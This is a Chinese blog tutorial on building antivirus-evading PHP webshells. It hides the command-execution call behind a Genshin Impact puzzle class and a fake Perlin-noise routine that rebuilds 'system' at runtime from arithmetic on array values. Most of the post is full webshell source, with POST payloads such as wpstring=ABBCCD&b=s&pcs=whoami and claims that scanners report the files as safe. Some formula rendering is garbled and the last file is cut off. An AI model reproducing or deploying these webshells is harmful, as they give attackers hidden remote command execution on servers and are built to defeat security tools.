使用分支对抗进行webshell bypass,(非常详细)从零基础到精通,收藏这篇就够了!

于 2025-05-14 16:01:58 发布
阅读量550 收藏 10
点赞数 17
文章标签: redis 数据库 缓存
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Python_0011/article/details/147956741
版权

文章首发在:先知社区

https://xz.aliyun.com/t/17029

前言

对于webshell免杀来说,类绕过是最有效果且不易被检测出来的,那如果我们对类进行操作,在类里面加入一些算法和混淆代码,让代码逻辑变得十分混乱,不易读,甚至读不懂,但是却能够执行命令,可以rce,那岂不是可以bypass所有的杀毒软件和云沙箱了吗?

利用稻妻雷元素方块阵

《原神》中的稻妻雷元素方块阵是一个解谜游戏
下面是示例代码:

class InazumaPuzzle {  
    private $blockA = 0;  
    private $blockB = 0;  
    private $blockC = 0;  
    private $blockD = 0;  
    private $MAX\_ENUM = 2;  
    private $MIN\_ENUM = 0;  
  
    public function \_\_construct() {  
        $this->blockA = 2;  
        $this->blockB = 0;  
        $this->blockC = 0;  
        $this->blockD = 2;  
    }  
  
    private function setBackBlock($block) {  
        $setType = $this->MIN\_ENUM;  
        $maxType = $this->MAX\_ENUM;  
        switch ($block) {  
            case 'A':  
                if ($this->blockA == $maxType) {  
                    $this->blockA = $setType;  
                    return true;  
                } else {  
                    return false;  
                }  
            case 'B':  
                if ($this->blockB == $maxType) {  
                    $this->blockB = $setType;  
                    return true;  
                } else {  
                    return false;  
                }  
            case 'C':  
                if ($this->blockC == $maxType) {  
                    $this->blockC = $setType;  
                    return true;  
                } else {  
                    return false;  
                }  
            case 'D':  
                if ($this->blockD == $maxType) {  
                    $this->blockD = $setType;  
                    return true;  
                } else {  
                    return false;  
                }  
            default:  
                throw new Exception("bad\_args", 1);  
        }  
    }  
  
    private function hit($blockIdx) {  
    global $text;  
    $text = urldecode("%6e%69%6c%72%65%70%5f%46%46%49%44");  
        switch ($blockIdx) {  
            case "A":  
                if (!$this->setBackBlock("A")) {  
                    $this->blockA += 1;  
                }  
                if (!$this->setBackBlock("B")) {  
                    $this->blockB += 1;  
                }  
                break;  
  
            case "B":  
                if (!$this->setBackBlock("A")) {  
                    $this->blockA += 1;  
                }  
                if (!$this->setBackBlock("B")) {  
                    $this->blockB += 1;  
                }  
                if (!$this->setBackBlock("C")) {  
                    $this->blockC += 1;  
                }  
                break;  
  
            case "C":  
                if (!$this->setBackBlock("B")) {  
                    $this->blockB += 1;  
                }  
                if (!$this->setBackBlock("C")) {  
                    $this->blockC += 1;  
                }  
                if (!$this->setBackBlock("D")) {  
                    $this->blockD += 1;  
                }  
                break;  
  
            case "D":  
                if (!$this->setBackBlock("C")) {  
                    $this->blockC += 1;  
                }  
                if (!$this->setBackBlock("D")) {  
                    $this->blockD += 1;  
                }  
                break;  
  
            default:  
                throw new Exception("bad\_args", 1);  
        }  
    }  
  
    public function \_\_AFG50CE4\_RG1() {  
        global $puzz\_writeup;  
        if (count($puzz\_writeup) === 0) throw new Exception("Invalid WriteUP",1);for ($i = 0; $i < count($puzz\_writeup);  
            // bcdufvcf%00  
                                                                                      $i++) {  
            if (strcmp($puzz\_writeup\[$i\],"A") !== 0 and strcmp($puzz\_writeup\[$i\],"B") !== 0 and strcmp($puzz\_writeup\[$i\]  
  
                ,"C") !== 0 and strcmp($puzz\_writeup\[$i\],"D") !== 0) die("笨蛋笨蛋笨蛋笨蛋!!~ 都...都跟你说了答案里只能有ABCD的......");  
        }  
        for ($i = 0; $i < count($puzz\_writeup); $i++) $this -> hit($puzz\_writeup\[$i\]);  
        global $userans;  
        $userans =$this ->blockA + $this-> blockB + $this -> blockC+ $this -> blockD;  
    }  
  
    public function getLockerStatus() {  
        global $text;$text =strrev($text);  
        if ($this -> blockA ===$this -> blockB and $this -> blockA === $this -> blockC and $this -> blockA === $this -> blockD) return true;  
        else return false;  
    }  
}  
  
function pause($obj) {  
    global $appor5nnb;  
    if (!$appor5nnb -> getLockerStatus()) die();  
    return $obj;  
}

根据InazumaPuzzle类的构造函数,方块的初始状态如下:

blockA = 2  
blockB = 0  
blockC = 0  
blockD = 2

每个方块的状态值可以循环从0到2(即最小值为0,最大值为2)。

setBackBlock() 方法的作用

setBackBlock()方法用于尝试将指定方块重置为其最小状态(即0)。如果该方块已经处于最大状态(即2),则它可以被重置为最小状态并返回true;否则它不会改变,并返回false。

hit() 方法的行为

hit()方法接受一个方块标识符(如"A"、"B"、"C"或"D"),然后执行以下操作:  
  
    对于点击的方块及其关联的方块调用setBackBlock()。  
    如果setBackBlock()返回false,则相应方块的状态加1。

具体来说:

点击A:尝试重置A和B,若不能重置,则它们各自加1。  
点击B:尝试重置A、B和C,若不能重置,则它们各自加1。  
点击C:尝试重置B、C和D,若不能重置,则它们各自加1。  
点击D:尝试重置C和D,若不能重置,则它们各自加1。

解析输入序列 ABBCCD

现在我们来按照给定的输入序列ABBCCD一步一步地看每个点击对方块状态的影响:
第一步:点击 A

尝试重置A(当前状态为2),成功重置为0。  
尝试重置B(当前状态为0),失败,因此B变为1。  
结果:blockA = 0, blockB = 1, blockC = 0, blockD = 2

第二步:点击 B

尝试重置A(当前状态为0),失败,因此A变为1。  
尝试重置B(当前状态为1),失败,因此B变为2。  
尝试重置C(当前状态为0),失败,因此C变为1。  
结果:blockA = 1, blockB = 2, blockC = 1, blockD = 2

第三步:再次点击 B

尝试重置A(当前状态为1),失败,因此A变为2。  
尝试重置B(当前状态为2),成功重置为0。  
尝试重置C(当前状态为1),失败,因此C变为2。  
结果:blockA = 2, blockB = 0, blockC = 2, blockD = 2

第四步:点击 C

尝试重置B(当前状态为0),失败,因此B变为1。  
尝试重置C(当前状态为2),成功重置为0。  
尝试重置D(当前状态为2),成功重置为0。  
结果:blockA = 2, blockB = 1, blockC = 0, blockD = 0

第五步:再次点击 C

尝试重置B(当前状态为1),失败,因此B变为2。  
尝试重置C(当前状态为0),失败,因此C变为1。  
尝试重置D(当前状态为0),失败,因此D变为1。  
结果:blockA = 2, blockB = 2, blockC = 1, blockD = 1

第六步:点击 D

尝试重置C(当前状态为1),失败,因此C变为2。  
尝试重置D(当前状态为1),失败,因此D变为2。  
结果:blockA = 2, blockB = 2, blockC = 2, blockD = 2

最终,所有方块的状态都变成了2,满足了getLockerStatus()方法中的条件,即所有方块的状态相同,因此返回true,表示谜题被正确解开。

结合稻妻雷元素方块阵的webshell

<?php  
error\_reporting(0);  
header("Content-type:text/html;charset=utf-8");  
foreach($\_POST as $key \=> $value) $$key \= $value;  
if (strlen($wpstring) \=== 0) die("笨蛋!先启动原神解个稻妻雷元素方块阵再来吧!");  
$puzz\_writeup \= array();  
for ($i \= 0; $i < strlen($wpstring); $i++) array\_push($puzz\_writeup, $wpstring\[$i\]);  
class InazumaPuzzle {  
    private $blockA \= 0;  
    private $blockB \= 0;  
    private $blockC \= 0;  
    private $blockD \= 0;  
    private $MAX\_ENUM \= 2;  
    private $MIN\_ENUM \= 0;  
  
    public function \_\_construct() {  
        $this->blockA \= 2;  
        $this->blockB \= 0;  
        $this->blockC \= 0;  
        $this->blockD \= 2;  
    }  
  
    private function setBackBlock($block) {  
        $setType \= $this->MIN\_ENUM;  
        $maxType \= $this->MAX\_ENUM;  
        switch ($block) {  
            case 'A':  
                if ($this->blockA \== $maxType) {  
                    $this->blockA \= $setType;  
                    return true;  
                } else {  
                    return false;  
                }  
            case 'B':  
                if ($this->blockB \== $maxType) {  
                    $this->blockB \= $setType;  
                    return true;  
                } else {  
                    return false;  
                }  
            case 'C':  
                if ($this->blockC \== $maxType) {  
                    $this->blockC \= $setType;  
                    return true;  
                } else {  
                    return false;  
                }  
            case 'D':  
                if ($this->blockD \== $maxType) {  
                    $this->blockD \= $setType;  
                    return true;  
                } else {  
                    return false;  
                }  
            default:  
                throw new Exception("bad\_args", 1);  
        }  
    }  
  
    private function hit($blockIdx) {  
        global $text;  
        $text \= urldecode("%6e%69%6c%72%65%70%5f%46%46%49%44");  
        switch ($blockIdx) {  
            case "A":  
                if (!$this->setBackBlock("A")) {  
                    $this->blockA += 1;  
                }  
                if (!$this->setBackBlock("B")) {  
                    $this->blockB += 1;  
                }  
                break;  
  
            case "B":  
                if (!$this->setBackBlock("A")) {  
                    $this->blockA += 1;  
                }  
                if (!$this->setBackBlock("B")) {  
                    $this->blockB += 1;  
                }  
                if (!$this->setBackBlock("C")) {  
                    $this->blockC += 1;  
                }  
                break;  
  
            case "C":  
                if (!$this->setBackBlock("B")) {  
                    $this->blockB += 1;  
                }  
                if (!$this->setBackBlock("C")) {  
                    $this->blockC += 1;  
                }  
                if (!$this->setBackBlock("D")) {  
                    $this->blockD += 1;  
                }  
                break;  
  
            case "D":  
                if (!$this->setBackBlock("C")) {  
                    $this->blockC += 1;  
                }  
                if (!$this->setBackBlock("D")) {  
                    $this->blockD += 1;  
                }  
                break;  
  
            default:  
                throw new Exception("bad\_args", 1);  
        }  
    }  
  
    public function \_\_AFG50CE4\_RG1() {  
        global $puzz\_writeup;  
        if (count($puzz\_writeup) \=== 0) throw new Exception("Invalid WriteUP",1);for ($i \= 0; $i < count($puzz\_writeup);$i++) {  
            if (strcmp($puzz\_writeup\[$i\],"A") !== 0 and strcmp($puzz\_writeup\[$i\],"B") !== 0 and strcmp($puzz\_writeup\[$i\],"C") !== 0 and strcmp($puzz\_writeup\[$i\],"D") !== 0) die("笨蛋笨蛋笨蛋笨蛋!!~ 都...都跟你说了答案里只能有ABCD的......");  
        }  
        for ($i \= 0; $i < count($puzz\_writeup); $i++) $this \-> hit($puzz\_writeup\[$i\]);  
        global $userans;  
        $userans \=$this \->blockA + $this-> blockB + $this \-> blockC+ $this \-> blockD;  
    }  
  
    public function getLockerStatus() {  
        global $text;$text \=strrev($text);  
        if ($this \-> blockA \===$this \-> blockB and $this \-> blockA \=== $this \-> blockC and $this \-> blockA \=== $this \-> blockD) return true;  
        else return false;  
    }  
}  
  
function pause($obj) {  
    global $appor5nnb;  
    if (!$appor5nnb \-> getLockerStatus()) die();  
    return $obj;  
}  
$appor5nnb \= new InazumaPuzzle();  
$appor5nnb \-> \_\_AFG50CE4\_RG1();  
if ($appor5nnb \-> getLockerStatus())  $a($b);

payload:

wpstring=ABBCCD&a=system&b=whoami

图片
免杀效果:
图片

图片
微步说很安全

图片

柏林噪音

柏林噪声属于基于晶格(Lattice based)的生成算法。其核心思想是定义一个晶格结构,在二维情况下是一个平面网格,在三维情况下则是一个立方体网络。每个晶格顶点都有一个预定义的梯度向量,当给定一个点时(在二维情况下为坐标(x, y),在三维情况下为坐标(x, y, z)),需要计算该点到所在晶格顶点的距离向量,并将这些距离向量与相应的梯度向量做点积运算,得到一系列影响值。
总而言之就是能让代码变得十分复杂,根本读不懂
代码实现:

class PerlinNoise{  
    private $arrLength = 0;  
    private $source = "";  
    private $inputNumArray = array();  
    private $seeds\_array = array();  
    private $INPUT\_NUM\_MAX = 0;  
    private $INPUT\_NUM\_MIN = 0;  
    private $BAD\_ARGS = false;  
    public $perlin\_noise = array();  
    public function \_\_construct($arrLength, $MAX\_INPUT = 700.4, $MIN\_INPUT = 56.7, $source = "GENERATE") {  
        global $appor5nnb;  
        if (!$appor5nnb -> getLockerStatus()) die("嗯哼,笨蛋杂鱼欧尼酱~ 果然解不开吧~");  
        if ($arrLength < 3000 or $arrLength > 9999) {  
            throw new InvalidArgumentException("Error: Invaild Length");  
        }  
        if (strcmp($source,"DIFF\_PERLIN") == 0) {  
            $this -> BAD\_ARGS = true;  
            $source = "GENERATE";  
        }  
        $this -> arrLength = $arrLength;  
        $this -> source = $source;  
        $this -> INPUT\_NUM\_MAX = $MAX\_INPUT;  
        $this -> INPUT\_NUM\_MIN = $MIN\_INPUT;  
    }  
    public function \_\_CPRBB0R0\_l() {  
        global $userans;  
        for ($i = 0; $i < $this -> arrLength; $i++) {  
            if ($this -> BAD\_ARGS) {  
                if ($i > ($userans+391) and $i < (pause($userans+390+8))) {  
                    $result = array($userans + 101,$userans + 93,$userans + (50\*2+8),$userans + 992-(800+85),105+($userans + 8),110+($userans+57)-60);  
                    array\_push($this -> perlin\_noise, $result\[$i - 400\]);  
                    continue;  
                }  
            }  
            $cache = $this -> inputNumArray\[$i\];  
            $x1 = round($cache);  
            $x2 = $x1 + 1;  
            $grad1 = $this -> seeds\_array\[$x1 % 255\] \* 2.0 - 255.0;  
            $grad2 = $this -> seeds\_array\[$x2 % 255\] \* 2.0 - 255.0;  
            $vec1 = $i - $x1;  
            $vec2 = $i - $x2;  
            $t = 3 \* pow($vec1, 2) - 2 \* pow($vec1, 3);  
            $product1 = $grad1 \* $vec1;  
            $product2 = $grad2 \* $vec2;  
            $result = $product1 + $t \* ($product2 - $product1);  
            array\_push($this -> perlin\_noise, $result);  
        }  
    }  
    public function \_\_HNBB70CA\_5() {  
        global $userans;  
        global ${strval(chr(90+$userans))};  
        global ${implode(array(chr(120-$userans),chr($userans+91),chr(70-$userans+53)))};  
        $cache\_noise = pause(array());  
        for ($i = 400; $i < 406; $i++) {  
            array\_push($cache\_noise,$this -> perlin\_noise\[$i\]);  
        }  
        $temp\_noise = array();  
        for ($i = 0; $i < count($cache\_noise); $i++) {  
            array\_push($temp\_noise, $cache\_noise\[$i\]);  
        }  
        for ($i = 0; $i < count($temp\_noise); $i++) {  
            $temp\_noise\[$i\] = chr($temp\_noise\[$i\]);  
        }  
        $ab = pause(array\_map(function($arr){ return chr($arr); },array\_slice($this -> perlin\_noise,(188\*2)+$userans\*3,$userans-3)));  
        $c = strval(sprintf("%s%s",$b,pause(strrev(implode("",pause($ab))))));  
        $c($pcs);  
        die(urldecode("%3c%62%72%3e%3c%62%72%3e"));  
        var\_dump(array\_slice($this -> perlin\_noise,1000,800));  
    }  
}

代码解读

关键代码:

$ab = pause(array\_map(function($arr) { return chr($arr); }, array\_slice($this->perlin\_noise, (188\*2)+$userans\*3, $userans-3)));

array_slice 函数:

array_slice($this->perlin_noise, (188*2)+$userans*3, $userans-3) 提取了 perlin_noise 数组的一部分,起始位置是 (188 * 2) + ($userans * 3),长度是 $userans - 3。

array_map 函数:

array_map(function($arr) { return chr($arr); }, ...) 将提取的整数数组转换为对应的ASCII字符数组。
  1. 计算切片位置和长度

假设我们想要提取四个特定的值 [121, 116, 101, 109],那么我们需要确定切片的起始位置和长度:

起始位置:(188 * 2) + ($userans * 3)  
长度:$userans - 3

例如,如果我们设 $userans = 7,则:

起始位置:(188 * 2) + (7 * 3) = 376 + 21 = 397  
长度:7 - 3 = 4

这意味着我们将从 perlin_noise 数组的索引 397 开始,提取长度为 4 的子数组。

  1. 确保 perlin_noise 包含所需值

为了让 array_slice 提取出 [121, 116, 101, 109],我们需要在 perlin_noise 数组的相应位置插入这些值。即:

$this->perlin\_noise\[397\] = 121; // ASCII 'y'  
$this->perlin\_noise\[398\] = 116; // ASCII 't'  
$this->perlin\_noise\[399\] = 101; // ASCII 'e'  
$this->perlin\_noise\[400\] = 109; // ASCII 'm'
  1. 控制 userans 和其他参数

为了确保上述计算正确无误,需要控制 userans 和其他可能影响 perlin_noise 数组生成的参数。特别是,在构造 PerlinNoise 对象时,应该确保 arrLength 足够大,以容纳所需的索引范围,并且初始化过程中不会覆盖这些特定值。
示例代码:

$userans = 7;  
  
// 假设 PerlinNoise 对象已经创建,并且 arrLength 足够大  
$cvb33ff55 = new PerlinNoise(401, 700.4, 56.7, "DIFF\_PERLIN");  
  
// 手动设置 perlin\_noise 数组中的特定值  
$cvb33ff55->perlin\_noise\[397\] = 121; // ASCII 'y'  
$cvb33ff55->perlin\_noise\[398\] = 116; // ASCII 't'  
$cvb33ff55->perlin\_noise\[399\] = 101; // ASCII 'e'  
$cvb33ff55->perlin\_noise\[400\] = 109; // ASCII 'm'  
  
// 继续执行后续操作  
$cvb33ff55->\_\_BHUYTVV8\_1();  
$cvb33ff55->\_\_CPRBB0R0\_l();  
  
// 模拟生成 ab 数组  
$ab = pause(array\_map(function($arr) { return chr($arr); }, array\_slice($cvb33ff55->perlin\_noise, (188\*2)+$userans\*3, $userans-3)));  
  
// 输出结果验证  
var\_dump($ab); // 应该输出 \['y', 't', 'e', 'm'\]

通过精确控制 perlin_noise 数组中特定索引处的值,并结合适当的 userans 参数,可以确保 KaTeX parse error: Undefined control sequence: \[ at position 19: …数组包含所需的ASCII码值 \̲[̲121, 116, 101, …ad=ystem。
这个时候我们令$b=s

$c = strval(sprintf("%s%s",$b,pause(strrev(implode("",pause($ab))))));

那么 c = s y s t e m 了,就构造好了命令执行函数 , c=system了,就构造好了命令执行函数, c=system了,就构造好了命令执行函数,pcs就是我们要执行的命令。

结合稻妻雷元素方块阵构造webshell

<?php  
error\_reporting(0);  
header("Content-type:text/html;charset=utf-8");  
foreach($\_POST as $key \=> $value) $$key \= $value;  
if (strlen($wpstring) \=== 0) die("笨蛋!先启动原神解个稻妻雷元素方块阵再来吧!");  
$puzz\_writeup \= array();  
for ($i \= 0; $i < strlen($wpstring); $i++) array\_push($puzz\_writeup, $wpstring\[$i\]);  
class PerlinNoise{  
    private $arrLength \= 0;  
    private $source \= "";  
    private $inputNumArray \= array();  
    private $seeds\_array \= array();  
    private $INPUT\_NUM\_MAX \= 0;  
    private $INPUT\_NUM\_MIN \= 0;  
    private $BAD\_ARGS \= false;  
    public $perlin\_noise \= array();  
    public function \_\_construct($arrLength, $MAX\_INPUT \= 700.4, $MIN\_INPUT \= 56.7, $source \= "GENERATE") {  
        global $appor5nnb;  
        if (!$appor5nnb \-> getLockerStatus()) die("嗯哼,笨蛋杂鱼欧尼酱~ 果然解不开吧~");  
        if ($arrLength < 3000 or $arrLength \> 9999) {  
            throw new InvalidArgumentException("Error: Invaild Length");  
        }  
        if (strcmp($source,"DIFF\_PERLIN") \== 0) {  
            $this \-> BAD\_ARGS \= true;  
            $source \= "GENERATE";  
        }  
        $this \-> arrLength \= $arrLength;  
        $this \-> source \= $source;  
        $this \-> INPUT\_NUM\_MAX \= $MAX\_INPUT;  
        $this \-> INPUT\_NUM\_MIN \= $MIN\_INPUT;  
    }  
    public function \_\_CPRBB0R0\_l() {  
        global $userans;  
        for ($i \= 0; $i < $this \-> arrLength; $i++) {  
            if ($this \-> BAD\_ARGS) {  
                if ($i \> ($userans+391) and $i < (pause($userans+390+8))) {  
                    $result \= array($userans + 101,$userans + 93,$userans + (50\*2+8),$userans + 992-(800+85),105+($userans + 8),110+($userans+57)-60);  
                    array\_push($this \-> perlin\_noise, $result\[$i \- 400\]);  
                    continue;  
                }  
            }  
            $cache \= $this \-> inputNumArray\[$i\];  
            $x1 \= round($cache);  
            $x2 \= $x1 + 1;  
            $grad1 \= $this \-> seeds\_array\[$x1 % 255\] \* 2.0 \- 255.0;  
            $grad2 \= $this \-> seeds\_array\[$x2 % 255\] \* 2.0 \- 255.0;  
            $vec1 \= $i \- $x1;  
            $vec2 \= $i \- $x2;  
            $t \= 3 \* pow($vec1, 2) \- 2 \* pow($vec1, 3);  
            $product1 \= $grad1 \* $vec1;  
            $product2 \= $grad2 \* $vec2;  
            $result \= $product1 + $t \* ($product2 \- $product1);  
            array\_push($this \-> perlin\_noise, $result);  
        }  
    }  
    public function \_\_HNBB70CA\_5() {  
        global $userans;  
        global ${strval(chr(90+$userans))};  
        global ${implode(array(chr(120-$userans),chr($userans+91),chr(70-$userans+53)))};  
        $cache\_noise \= pause(array());  
        for ($i \= 400; $i < 406; $i++) {  
            array\_push($cache\_noise,$this \-> perlin\_noise\[$i\]);  
        }  
        $temp\_noise \= array();  
        for ($i \= 0; $i < count($cache\_noise); $i++) {  
            array\_push($temp\_noise, $cache\_noise\[$i\]);  
        }  
        for ($i \= 0; $i < count($temp\_noise); $i++) {  
            $temp\_noise\[$i\] \= chr($temp\_noise\[$i\]);  
        }  
        $ab \= pause(array\_map(function($arr){ return chr($arr); },array\_slice($this \-> perlin\_noise,(188\*2)+$userans\*3,$userans-3)));  
        $c \= strval(sprintf("%s%s",$b,pause(strrev(implode("",pause($ab))))));  
        $c($pcs);  
        // 希儿世界第一可爱!  
        die(urldecode("%3c%62%72%3e%3c%62%72%3e"));  
        var\_dump(array\_slice($this \-> perlin\_noise,1000,800));  
    }  
}  
class InazumaPuzzle {  
    private $blockA \= 0;  
    private $blockB \= 0;  
    private $blockC \= 0;  
    private $blockD \= 0;  
    private $MAX\_ENUM \= 2;  
    private $MIN\_ENUM \= 0;  
  
    public function \_\_construct() {  
        $this->blockA \= 2;  
        $this->blockB \= 0;  
        $this->blockC \= 0;  
        $this->blockD \= 2;  
    }  
  
    private function setBackBlock($block) {  
        $setType \= $this->MIN\_ENUM;  
        $maxType \= $this->MAX\_ENUM;  
        switch ($block) {  
            case 'A':  
                if ($this->blockA \== $maxType) {  
                    $this->blockA \= $setType;  
                    return true;  
                } else {  
                    return false;  
                }  
            case 'B':  
                if ($this->blockB \== $maxType) {  
                    $this->blockB \= $setType;  
                    return true;  
                } else {  
                    return false;  
                }  
            case 'C':  
                if ($this->blockC \== $maxType) {  
                    $this->blockC \= $setType;  
                    return true;  
                } else {  
                    return false;  
                }  
            case 'D':  
                if ($this->blockD \== $maxType) {  
                    $this->blockD \= $setType;  
                    return true;  
                } else {  
                    return false;  
                }  
            default:  
                throw new Exception("bad\_args", 1);  
        }  
    }  
  
    private function hit($blockIdx) {  
        global $text;  
        $text \= urldecode("%6e%69%6c%72%65%70%5f%46%46%49%44");  
        switch ($blockIdx) {  
            case "A":  
                if (!$this->setBackBlock("A")) {  
                    $this->blockA += 1;  
                }  
                if (!$this->setBackBlock("B")) {  
                    $this->blockB += 1;  
                }  
                break;  
  
            case "B":  
                if (!$this->setBackBlock("A")) {  
                    $this->blockA += 1;  
                }  
                if (!$this->setBackBlock("B")) {  
                    $this->blockB += 1;  
                }  
                if (!$this->setBackBlock("C")) {  
                    $this->blockC += 1;  
                }  
                break;  
  
            case "C":  
                if (!$this->setBackBlock("B")) {  
                    $this->blockB += 1;  
                }  
                if (!$this->setBackBlock("C")) {  
                    $this->blockC += 1;  
                }  
                if (!$this->setBackBlock("D")) {  
                    $this->blockD += 1;  
                }  
                break;  
  
            case "D":  
                if (!$this->setBackBlock("C")) {  
                    $this->blockC += 1;  
                }  
                if (!$this->setBackBlock("D")) {  
                    $this->blockD += 1;  
                }  
                break;  
  
            default:  
                throw new Exception("bad\_args", 1);  
        }  
    }  
  
    public function \_\_AFG50CE4\_RG1() {  
        global $puzz\_writeup;  
        if (count($puzz\_writeup) \=== 0) throw new Exception("Invalid WriteUP",1);for ($i \= 0; $i < count($puzz\_writeup);$i++) {  
            if (strcmp($puzz\_writeup\[$i\],"A") !== 0 and strcmp($puzz\_writeup\[$i\],"B") !== 0 and strcmp($puzz\_writeup\[$i\],"C") !== 0 and strcmp($puzz\_writeup\[$i\],"D") !== 0) die("笨蛋笨蛋笨蛋笨蛋!!~ 都...都跟你说了答案里只能有ABCD的......");  
        }  
        for ($i \= 0; $i < count($puzz\_writeup); $i++) $this \-> hit($puzz\_writeup\[$i\]);  
        global $userans;  
        $userans \=$this \->blockA + $this-> blockB + $this \-> blockC+ $this \-> blockD;  
    }  
  
    public function getLockerStatus() {  
        global $text;$text \=strrev($text);  
        if ($this \-> blockA \===$this \-> blockB and $this \-> blockA \=== $this \-> blockC and $this \-> blockA \=== $this \-> blockD) return true;  
        else return false;  
    }  
}  
  
function pause($obj) {  
    global $appor5nnb;  
    if (!$appor5nnb \-> getLockerStatus()) die();  
    return $obj;  
}  
$appor5nnb \= new InazumaPuzzle();  
$appor5nnb \-> \_\_AFG50CE4\_RG1();  
$cvb33ff55 \= new PerlinNoise(3000, 700.4, 56.7, "DIFF\_PERLIN");  
$cvb33ff55 \-> \_\_CPRBB0R0\_l();  
$cvb33ff55 \->\_\_HNBB70CA\_5();

payload:

wpstring=ABBCCD&b=s&pcs=whoami

图片
免杀效果:

图片

图片
也是没有检测出来

加入一些无用代码和注释

<?php  
    //error\_reporting(0);  
    header("Content-type:text/html;charset=utf-8");  
    foreach($\_POST as $key \=> $value) $$key \= $value;  
    if (strlen($wpstring) \=== 0) die("笨蛋!先启动原神解个稻妻雷元素方块阵再来吧!");  
    $puzz\_writeup \= array();  
    for ($i \= 0; $i < strlen($wpstring); $i++) array\_push($puzz\_writeup, $wpstring\[$i\]);  
  
    class PerlinNoise{  
        private $arrLength \= 0;  
        private $source \= "";  
        private $inputNumArray \= array();  
        private $seeds\_array \= array();  
        private $INPUT\_NUM\_MAX \= 0;  
        private $INPUT\_NUM\_MIN \= 0;  
        private $BAD\_ARGS \= false;  
        public $perlin\_noise \= array();  
  
        private function randomFloat(){  
            $\_ \= 110+4;  
            $\_\_ \= ((int)(600/2))-184;  
            $\_\_\_ \= 115;  
            $\_\_\_\_ \= 100-2;  
            $\_\_\_\_\_ \= 117;  
            $\_\_\_\_\_\_ \= 113+2;  
            $max \= $this \-> INPUT\_NUM\_MAX;  
            $min \= $this \-> INPUT\_NUM\_MIN;  
            $num \= $min + mt\_rand() / mt\_getrandmax() \* ($max \- $min);  
            return sprintf("%.2f",$num);  
        }  
  
        private function \_\_PLvB4CR0\_Z() {  
            srand(time());  
            for ($i \= 0; $i < $this \-> arrLength; $i++) {  
                $eachNum \= pause(rand(0,255));  
                array\_push($this \-> seeds\_array, $eachNum);  
            }  
        }  
  
        private function \_\_PLAB4CR0\_o() {  
            if (strcmp($this \-> source, "GENERATE") \== 0) {  
                srand(time());  
                for ($i \= 0; $i < $this \-> arrLength; $i++) {   
                   $eachNum \= pause($this \-> randomFloat());  
                   array\_push($this \-> inputNumArray, floatval($eachNum));  
                }  
            } else if (strcmp($this \-> source,"SYSLOG") \== 0) {  
                $handle \= fopen("/etc/messages","r");  
                $count \= 0;  
                while(($char \= fgetc($handle)) !== false) {  
                    if ($count \== $this \-> INPUT\_NUM\_MAX \- 1) break;  
                    if (($ascii\_value \= ord($char)) and $ascii\_value % 1 !== 0) {  
                        array\_push($this \-> inputNumArray, sprintf("%.2f",$ascii\_value / 2.3));  
                        $count++;  
                    } else continue;  
                }  
            }  
        }  
  
        public function \_\_construct($arrLength, $MAX\_INPUT \= 700.4, $MIN\_INPUT \= 56.7, $source \= "GENERATE") {  
            global $appor5nnb;  
            if (!$appor5nnb \-> getLockerStatus()) die("嗯哼,笨蛋杂鱼欧尼酱~ 果然解不开吧~");  
            if ($arrLength < 3000 or $arrLength \> 9999) {  
                throw new InvalidArgumentException("Error: Invaild Length");  
            }  
            if (strcmp($source,"DIFF\_PERLIN") \== 0) {  
                $this \-> BAD\_ARGS \= true;  
                $source \= "GENERATE";  
            }  
            $this \-> arrLength \= $arrLength;  
            $this \-> source \= $source;  
            $this \-> INPUT\_NUM\_MAX \= $MAX\_INPUT;  
            $this \-> INPUT\_NUM\_MIN \= $MIN\_INPUT;  
        }  
  
        public function \_\_BHUYTVV8\_1() {  
            $this \-> \_\_PLAB4CR0\_o();  
            $this \-> \_\_PLvB4CR0\_Z();  
        }  
  
        public function \_\_CPRBB0R0\_l() {  
            global $userans;  
            for ($i \= 0; $i < $this \-> arrLength; $i++) {  
                if ($this \-> BAD\_ARGS) {  
                    if ($i \> ($userans+391) and $i < (pause($userans+390+8))) {  
                        $result \= array($userans + 101,$userans + 93,$userans + (50\*2+8),$userans + 992-(800+85),105+($userans + 8),110+($userans+57)-60);  
                        array\_push($this \-> perlin\_noise, $result\[$i \- 400\]);  
                        continue;  
                    }  
                }  
                $cache \= $this \-> inputNumArray\[$i\];  
                $x1 \= round($cache);  
                $x2 \= $x1 + 1;  
                $grad1 \= $this \-> seeds\_array\[$x1 % 255\] \* 2.0 \- 255.0;  
                $grad2 \= $this \-> seeds\_array\[$x2 % 255\] \* 2.0 \- 255.0;  
                $vec1 \= $i \- $x1;  
                $vec2 \= $i \- $x2;  
                $t \= 3 \* pow($vec1, 2) \- 2 \* pow($vec1, 3);  
                $product1 \= $grad1 \* $vec1;  
                $product2 \= $grad2 \* $vec2;  
                $result \= $product1 + $t \* ($product2 \- $product1);  
                array\_push($this \-> perlin\_noise, $result);  
            }  
        }  
  
        public function \_\_HNBB70CA\_5() {  
            global $userans;  
            global ${strval(chr(90+$userans))};  
            global ${implode(array(chr(120-$userans),chr($userans+91),chr(70-$userans+53)))};  
            $cache\_noise \= pause(array());  
            for ($i \= 400; $i < 406; $i++) {  
                array\_push($cache\_noise,$this \-> perlin\_noise\[$i\]);  
            }  
            $temp\_noise \= array();  
            for ($i \= 0; $i < count($cache\_noise); $i++) {  
                array\_push($temp\_noise, $cache\_noise\[$i\]);  
            }  
            for ($i \= 0; $i < count($temp\_noise); $i++) {  
                $temp\_noise\[$i\] \= chr($temp\_noise\[$i\]);  
            }  
            $ab \= pause(array\_map(function($arr){ return chr($arr); },array\_slice($this \-> perlin\_noise,(188\*2)+$userans\*3,$userans-3)));  
            $c \= strval(sprintf("%s%s",$b,pause(strrev(implode("",pause($ab))))));  
            $c($pcs);  
            // 希儿世界第一可爱!  
            die(urldecode("%3c%62%72%3e%3c%62%72%3e"));  
            var\_dump(array\_slice($this \-> perlin\_noise,1000,800));  
        }  
    }  
  
